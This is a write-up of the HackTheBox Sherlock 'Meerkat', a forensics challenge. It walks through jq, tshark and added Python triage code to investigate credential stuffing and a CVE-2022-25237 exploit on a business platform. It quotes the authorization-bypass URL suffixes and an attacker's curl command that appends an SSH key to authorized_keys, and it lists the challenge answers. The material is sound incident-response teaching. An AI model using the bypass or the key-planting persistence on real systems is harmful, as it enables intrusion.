HTB Sherlock: Meerkat


PCAP analysis - clean and easy to follow forensics challenge



This write-up is a part of the HTB Sherlocks series. Sherlocks are investigative challenges that test defensive security skills. I encourage you to try them out if you like digital forensics, incident response, post-breach analysis and malware analysis. Are you ready to start the investigation?

Incident Details

Name: Meerkat (Retired)
Category: SOC
Difficulty: Easy (Solved)

As a fast growing startup, Forela have been utilising a business management platform. Unfortunately our documentation is scarce and our administrators aren't the most security aware. As our new security provider we'd like you to take a look at some PCAP and log data we have exported to confirm if we have (or have not) been compromised.


01: ZIP archive, password protected (hacktheblue)
02: JSON file
03: pcapng capture file


In this scenario we have 10 questions to answer.

  1. We believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running?

$ jq '.[].alert.signature' meerkat-alerts.json | sort | uniq > alerts.sorted.unique

I'm assuming the application in question is the Business Management Platform mentioned in the brief. A couple of the unique signatures contain the same application name (blurred here):

  2. We believe the attacker may have used a subset of the brute forcing attack category - what is the name of the attack carried out?

Browsing the alerts I can see multiple "Default User Login Attempt" signatures and alerts mentioning "python-requests": a scripted client trying many different username/password pairs, rather than many passwords against a single account.

Answer: Credential Stuffing
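To make the first three steps repeatable, here is an added example (my own code, not part of the original write-up) that does in Python what the jq | sort | uniq pipeline does for question 1, then pulls out the credential-stuffing indicators from question 2 and the CVE identifier from question 3. The alert records are constructed in the shape I assume for meerkat-alerts.json (a JSON array of EVE-style alert events, which the jq expression .[] implies); the signature texts are placeholders that only reuse the strings mentioned above, not real Suricata rule names.

```python
"""Triage EVE-style alerts exported as a JSON array (added example, not from the write-up)."""
import json
import re
from collections import Counter

# Constructed sample in the shape assumed for meerkat-alerts.json: a JSON array
# of EVE "alert" events. Signatures are placeholders, not real rule names.
SAMPLE_ALERTS_JSON = """[
  {"timestamp": "2023-01-05T13:00:01Z", "src_ip": "10.0.0.5", "dest_ip": "10.0.0.10",
   "alert": {"signature": "Default User Login Attempt"},
   "http": {"http_user_agent": "python-requests/2.28.1", "url": "/loginservice"}},
  {"timestamp": "2023-01-05T13:00:02Z", "src_ip": "10.0.0.5", "dest_ip": "10.0.0.10",
   "alert": {"signature": "Default User Login Attempt"},
   "http": {"http_user_agent": "python-requests/2.28.1", "url": "/loginservice"}},
  {"timestamp": "2023-01-05T13:00:03Z", "src_ip": "10.0.0.5", "dest_ip": "10.0.0.10",
   "alert": {"signature": "Default User Login Attempt"},
   "http": {"http_user_agent": "python-requests/2.28.1", "url": "/loginservice"}},
  {"timestamp": "2023-01-05T13:00:04Z", "src_ip": "10.0.0.5", "dest_ip": "10.0.0.10",
   "alert": {"signature": "Suspicious User-Agent (python-requests)"},
   "http": {"http_user_agent": "python-requests/2.28.1", "url": "/loginservice"}},
  {"timestamp": "2023-01-05T13:01:00Z", "src_ip": "10.0.0.5", "dest_ip": "10.0.0.10",
   "alert": {"signature": "Possible authorization bypass attempt (CVE-2022-25237)"},
   "http": {"http_user_agent": "python-requests/2.28.1", "url": "/API/example;i18ntranslation"}},
  {"timestamp": "2023-01-05T13:05:00Z", "src_ip": "10.0.0.7", "dest_ip": "10.0.0.10",
   "alert": {"signature": "Benign web activity"},
   "http": {"http_user_agent": "Mozilla/5.0", "url": "/"}}
]"""

CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def load_alerts(text):
    """Parse the exported alert array; skip anything that is not an alert record."""
    return [a for a in json.loads(text) if isinstance(a, dict) and "alert" in a]


def signature_counts(alerts):
    """Equivalent of jq '.[].alert.signature' | sort | uniq -c."""
    return Counter(a["alert"].get("signature", "") for a in alerts)


def cve_ids(alerts):
    """Every CVE identifier named in any signature, deduplicated and sorted."""
    found = set()
    for a in alerts:
        found.update(CVE_RE.findall(a["alert"].get("signature", "")))
    return sorted(found)


def credential_stuffing_pairs(alerts, needle="Default User Login Attempt"):
    """Map (src_ip, dest_ip) behind the repeated default-login alerts to the
    user agents seen on them; a scripted agent such as python-requests is the
    second indicator the write-up relies on."""
    pairs = {}
    for a in alerts:
        if needle in a["alert"].get("signature", ""):
            key = (a.get("src_ip"), a.get("dest_ip"))
            pairs.setdefault(key, set()).add(a.get("http", {}).get("http_user_agent", ""))
    return pairs


if __name__ == "__main__":
    alerts = load_alerts(SAMPLE_ALERTS_JSON)
    for sig, n in signature_counts(alerts).most_common():
        print(f"{n:4d}  {sig}")
    print("CVEs named in alerts:", cve_ids(alerts))
    for (src, dst), agents in credential_stuffing_pairs(alerts).items():
        print(f"default-login attempts {src} -> {dst}, user agents: {sorted(agents)}")
```

Against the real export you would replace SAMPLE_ALERTS_JSON with the file contents; the source/destination pairs this prints are the hosts to filter on in Wireshark for the later questions.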

  3. Does the vulnerability exploited have a CVE assigned - and if so, which one?

The identifier appears verbatim in the alert signatures.

Answer: CVE-2022-25237

  4. Which string was appended to the API URL path to bypass the authorization filter by the attacker's exploit?

The public CVE-2022-25237 exploit works by appending either ;i18ntranslation or /../i18ntranslation/ to the end of an API URL, so I opened meerkat.pcap in Wireshark. The alerts already identify the source and destination of the credential stuffing (from ... to ...), so I filtered on those hosts and looked through the requests to see which of the two strings was used.

Answer: ;i18ntranslation

  5. How many combinations of usernames and passwords were used in the credential stuffing attack?

Now let's use the command-line TShark to filter and format the output so that the answer is easier to read off:

$ tshark -r meerkat.pcap -2 -R "http.request.full_uri contains loginservice" -T fields -e "tcp.segment_data" | sort | uniq |  xxd -p -r

This reads meerkat.pcap with tshark, keeps only packets whose request URI contains loginservice, prints a single field, tcp.segment_data (the hex-encoded TCP payload, which holds the POST body), sorts and deduplicates those values, and finally pipes them through xxd -p -r, which turns the hex dump back into the raw bytes.

The decoded bodies run together on one line because the form bodies themselves contain no trailing newline, so I broke the lines up in a text editor. There are 57 unique combinations, one of which (username=install&password=install) is a default-account check rather than part of the credential stuffing.

Answer: 56

  6. Which username and password combination was successful?

Search in Wireshark for the response that sets a JSESSIONID cookie, then follow that HTTP stream to see which credentials were sent in the request.
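The counting in question 5 and the cookie check in question 6 are easy to get wrong by hand, so here is an added example (my own code, not the write-up's) that reproduces in Python what the tshark | sort | uniq | xxd -p -r pipeline does and adds the two steps left to manual work: decoding each POST body onto its own line, and pairing a request with the response that set the JSESSIONID cookie. It also checks request URIs for the two CVE-2022-25237 suffixes from question 4. All sample traffic is constructed; the form field names username and password match the body shown above, and everything else (the URIs, the credentials, the response lines) is assumed.

```python
"""Recover credential-stuffing attempts from tshark field output (added example, not from the write-up)."""
from urllib.parse import parse_qs, urlsplit

# The default credentials the write-up excludes from the count: a default-account
# check, not a stuffed username/password pair.
DEFAULT_CREDS = {("install", "install")}
# The two known URL suffixes for the CVE-2022-25237 authorization bypass.
BYPASS_STRINGS = (";i18ntranslation", "/../i18ntranslation/")


def _hex(body):
    """Constructed stand-in for what tshark -e tcp.segment_data prints (hex of the payload)."""
    return body.encode().hex()


# Constructed login transactions in capture order. body_hex is the request body
# as tshark would print it; resp_head is the start of the server's reply.
TRANSACTIONS = [
    {"uri": "/loginservice", "body_hex": _hex("username=install&password=install"),
     "resp_head": "HTTP/1.1 401 Unauthorized\r\n"},
    {"uri": "/loginservice", "body_hex": _hex("username=alice&password=Winter2022"),
     "resp_head": "HTTP/1.1 401 Unauthorized\r\n"},
    {"uri": "/loginservice", "body_hex": _hex("username=alice&password=Winter2022"),
     "resp_head": "HTTP/1.1 401 Unauthorized\r\n"},   # duplicate, must not double-count
    {"uri": "/loginservice", "body_hex": _hex("username=bob&password=hunter2"),
     "resp_head": "HTTP/1.1 401 Unauthorized\r\n"},
    # Body split across two TCP segments: tshark joins field occurrences with ','
    {"uri": "/loginservice",
     "body_hex": _hex("username=carol&pass") + "," + _hex("word=Passw0rd!"),
     "resp_head": "HTTP/1.1 200 OK\r\nSet-Cookie: JSESSIONID=0123ABCD; Path=/; HttpOnly\r\n"},
    {"uri": "/API/example/resource;i18ntranslation", "body_hex": "",
     "resp_head": "HTTP/1.1 200 OK\r\n"},
]


def decode_segment_data(field):
    """xxd -p -r equivalent. tshark prints multiple occurrences of a field
    comma-separated, so join the segments before decoding."""
    raw = b"".join(bytes.fromhex(part) for part in field.split(",") if part)
    return raw.decode("utf-8", errors="replace")


def credentials(body):
    """Pull (username, password) out of a form-encoded body, or None if absent."""
    form = parse_qs(body, keep_blank_values=True)
    if "username" not in form or "password" not in form:
        return None
    return form["username"][0], form["password"][0]


def unique_attempts(transactions, exclude=DEFAULT_CREDS):
    """Distinct username/password pairs sent to the login endpoint, minus the
    default-account probe; len() of the result is the answer to question 5."""
    seen = set()
    for t in transactions:
        if "loginservice" not in t["uri"]:
            continue
        creds = credentials(decode_segment_data(t["body_hex"]))
        if creds and creds not in exclude:
            seen.add(creds)
    return seen


def successful_login(transactions):
    """The pair whose response set a JSESSIONID cookie (question 6), or None."""
    for t in transactions:
        if "set-cookie: jsessionid=" in t["resp_head"].lower():
            return credentials(decode_segment_data(t["body_hex"]))
    return None


def bypass_string(uri):
    """Which CVE-2022-25237 suffix, if any, was appended to the API path (question 4)."""
    path = urlsplit(uri).path   # urlsplit keeps ';params' inside .path
    for s in BYPASS_STRINGS:
        if s in path:
            return s
    return None


if __name__ == "__main__":
    attempts = unique_attempts(TRANSACTIONS)
    for user, pw in sorted(attempts):
        print(f"{user}:{pw}")
    print("unique stuffed combinations:", len(attempts))
    print("successful login:", successful_login(TRANSACTIONS))
    for t in TRANSACTIONS:
        if bypass_string(t["uri"]):
            print("bypass suffix on", t["uri"], "->", bypass_string(t["uri"]))
```

To run this against the real capture, feed it the hex lines from the tshark command above (one per request) instead of the constructed TRANSACTIONS; the comma handling matters because a POST body that spans two segments is otherwise decoded as two half bodies and miscounted.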

  7. If any, which text sharing site did the attacker utilise?

This time I was lucky because the answer was visible in the previous screen/filter.

Bonus: the requested URLs are still active and serve scripts that add an SSH key to the authorized_keys file and restart the SSH daemon.

  8. Please provide the filename of the public key used by the attacker to gain persistence on our host.

From the bonus section of the last question, the content of the first script (the fetched URL is omitted here):

curl >> /home/ubuntu/.ssh/authorized_keys
sudo service ssh restart

Answer: hffgra4unv

  9. Can you confirm the file modified by the attacker to gain persistence?

Again, the answer is in the script above.

Answer: /home/ubuntu/.ssh/authorized_keys

  10. Can you confirm the MITRE technique ID of this type of persistence mechanism?

Navigate to MITRE ATT&CK® -> Persistence -> Account Manipulation -> SSH Authorized Keys.

Answer: T1098.004

Data Recovery

None required.

Lessons Learned

  • jq for querying JSON data more easily

  • tshark for filtering and parsing PCAP files

Additional readings


Support Kamil Gierach-Pacanek by becoming a sponsor. Any amount is appreciated!